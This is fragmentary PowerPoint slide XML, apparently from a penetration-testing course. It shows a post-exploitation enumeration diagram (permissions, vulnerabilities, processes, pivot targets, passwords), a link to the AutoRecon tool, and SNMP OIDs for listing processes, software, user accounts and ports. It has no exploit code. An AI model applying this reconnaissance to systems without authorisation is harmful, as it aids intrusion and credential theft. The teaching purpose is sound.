        <a:ext cx="1620228" cy="1080152"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{154D5D72-A51F-482D-8C93-E923C883F49B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6482298" y="814590"/>
          <a:ext cx="2700380" cy="1080152"/>
        </a:xfrm>
        <a:prstGeom prst="chevron">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="accent3">
            <a:hueOff val="-3166148"/>
            <a:satOff val="-8506"/>
            <a:lumOff val="-1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Am I alone?</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="0" lvl="0" indent="0" algn="ctr" defTabSz="800100">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:rPr>
            <a:t>(intermediate targets)</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="7022374" y="814590"/>
        <a:ext cx="1620228" cy="1080152"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{BC7A68D8-1F64-4189-9354-83D034D85E20}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="8642602" y="814590"/>
          <a:ext cx="2700380" cy="1080152"/>
        </a:xfrm>
        <a:prstGeom prst="chevron">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="accent3">
            <a:hueOff val="-4221530"/>
            <a:satOff val="-11342"/>
            <a:lumOff val="-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What’s in my pocket?</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="0" lvl="0" indent="0" algn="ctr" defTabSz="800100">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:rPr>
            <a:t>(passwords, other info)</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="9182678" y="814590"/>
        <a:ext cx="1620228" cy="1080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00FD1-F073-4B16-805E-CC99C4EBA2F8}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1384" y="814590"/>
          <a:ext cx="2700380" cy="1080152"/>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Who am I?</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="0" lvl="0" indent="0" algn="ctr" defTabSz="800100">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:rPr>
            <a:t>(permissions)</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1384" y="814590"/>
        <a:ext cx="2430342" cy="1080152"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{FBFAE013-AF5E-4418-B606-582BABB37BBD}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2161689" y="814590"/>
          <a:ext cx="2700380" cy="1080152"/>
        </a:xfrm>
        <a:prstGeom prst="chevron">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="accent3">
            <a:hueOff val="-1055383"/>
            <a:satOff val="-2835"/>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Where am I?</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="0" lvl="0" indent="0" algn="ctr" defTabSz="800100">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:rPr>
            <a:t>(system vulns)</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2701765" y="814590"/>
        <a:ext cx="1620228" cy="1080152"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{EC45B1F4-3F2A-4915-B09B-57B4232D3063}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4321993" y="814590"/>
          <a:ext cx="2700380" cy="1080152"/>
        </a:xfrm>
        <a:prstGeom prst="chevron">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="accent3">
            <a:hueOff val="-2110765"/>
            <a:satOff val="-5671"/>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What’s going on?</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="0" lvl="0" indent="0" algn="ctr" defTabSz="800100">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:rPr>
            <a:t>(processes)</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4862069" y="814590"/>
        <a:ext cx="1620228" cy="1080152"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{154D5D72-A51F-482D-8C93-E923C883F49B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6482298" y="814590"/>
          <a:ext cx="2700380" cy="1080152"/>
        </a:xfrm>
        <a:prstGeom prst="chevron">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="accent3">
            <a:hueOff val="-3166148"/>
            <a:satOff val="-8506"/>
            <a:lumOff val="-1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Am I alone?</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="0" lvl="0" indent="0" algn="ctr" defTabSz="800100">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:rPr>
            <a:t>(intermediate targets)</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="7022374" y="814590"/>
        <a:ext cx="1620228" cy="1080152"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{BC7A68D8-1F64-4189-9354-83D034D85E20}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="8642602" y="814590"/>
          <a:ext cx="2700380" cy="1080152"/>
        </a:xfrm>
        <a:prstGeom prst="chevron">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="accent3">
            <a:hueOff val="-4221530"/>
            <a:satOff val="-11342"/>
            <a:lumOff val="-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What’s in my pocket?</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="0" lvl="0" indent="0" algn="ctr" defTabSz="800100">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:rPr>
            <a:t>(passwords, other info)</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="9182678" y="814590"/>
        <a:ext cx="1620228" cy="10801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155A5-D247-4083-9D9F-ABAFCD6A510C}"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BB05E-1E6C-4C3B-AA92-F8706E8A1FB7}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="352729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https://github.com/Tib3rius/AutoRecon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89008-A845-3542-9030-80EE4706E7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3457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89008-A845-3542-9030-80EE4706E7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0013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89008-A845-3542-9030-80EE4706E7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0570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89008-A845-3542-9030-80EE4706E7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7725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1.3.6.1.2.1.25.1.6.0 - System Processes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1.3.6.1.2.1.25.4.2.1.2 - Running Programs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1.3.6.1.2.1.25.4.2.1.4 - Processes Path</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1.3.6.1.2.1.25.2.3.1.4 - Storage Units</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1.3.6.1.2.1.25.6.3.1.2 - Software Name</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1.3.6.1.4.1.77.1.2.25 - User Accounts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1.3.6.1.2.1.6.13.1.3 - TCP Local Ports</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>accessing statistics stored within a router or other device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251</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="55603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nchor="t"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100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560834" y="4090988"/>
            <a:ext cx="4687887" cy="628650"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click to edit date</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="792993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87368" y="6400800"/>
            <a:ext cx="8817264" cy="182880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Date Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{37CC0096-1860-4642-9CD2-0079EA5E7CD1}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>3/17/2023</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583700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dirty="0"/>
              <a:t>Click to edit date</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1709206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dirty="0"/>
              <a:t>Click to edit date</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2202328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612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dirty="0"/>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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3180831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90494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Edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1033666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852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92841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72595"/>
            <a:ext cx="8216900" cy="123111"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>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20466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228600" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr sz="2400"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="466725" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr sz="2000"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="690563" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr sz="18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p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="46160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dirty="0"/>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833678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dirty="0"/>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2220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dirty="0"/>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62555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534833"/>
            <a:ext cx="4474733" cy="123111"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" dirty="0"/>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579101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534833"/>
            <a:ext cx="4474733" cy="123111"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" dirty="0"/>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73167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91370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83535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530951"/>
            <a:ext cx="4603531" cy="123111"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>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26769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72595"/>
            <a:ext cx="8216900" cy="123111"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>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732950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72595"/>
            <a:ext cx="8216900" cy="123111"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="309257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6720" y="2926080"/>
            <a:ext cx="10515600" cy="840230"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:defRPr sz="3600"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Section Title</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4250492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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12756879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1780870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713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dirty="0"/>
              <a:t>Click to edit date</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3148113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dirty="0"/>
              <a:t>Click to edit date</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2649955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dirty="0"/>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5251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dirty="0"/>
              <a:t>Section Title</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40527338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3464939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dirty="0"/>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dirty="0"/>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dirty="0"/>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2497213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2038811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dirty="0"/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3181993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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3625037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dirty="0"/>
              <a:t>Click to add media </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23851498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dirty="0"/>
              <a:t>Click to add chart</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7759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dirty="0"/>
              <a:t>Click to add chart</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3217745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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9422514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3600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dirty="0"/>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>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7821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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21947502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dirty="0"/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26632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28400374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dirty="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41522905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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="421905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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35940942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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="416696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437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dirty="0"/>
              <a:t>Click to edit date</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="465516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dirty="0"/>
              <a:t>Click to edit date</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36747260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149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dirty="0"/>
              <a:t>Section Title</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6632600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90340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nchor="b"/>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7BC50528-D44C-4D0C-8A92-A13CA744695F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1920240"/>
            <a:ext cx="11338560" cy="4023360"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2012729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dirty="0"/>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dirty="0"/>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dirty="0"/>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38262986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452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dirty="0"/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3483681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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19151512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dirty="0"/>
              <a:t>Click to add media </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2854755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dirty="0"/>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7469465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dirty="0"/>
              <a:t>Click to add chart</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16331094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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4169373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dirty="0"/>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91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dirty="0"/>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>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675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FE4215-CB31-416D-AD8E-2EB300E4A45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6051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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29267673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dirty="0"/>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Drag photo to placeholder or click on icon to place photo from file. Ensure image is large enough in size and resolution.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31619834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dirty="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6852252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spTree>
    <p:extLst>
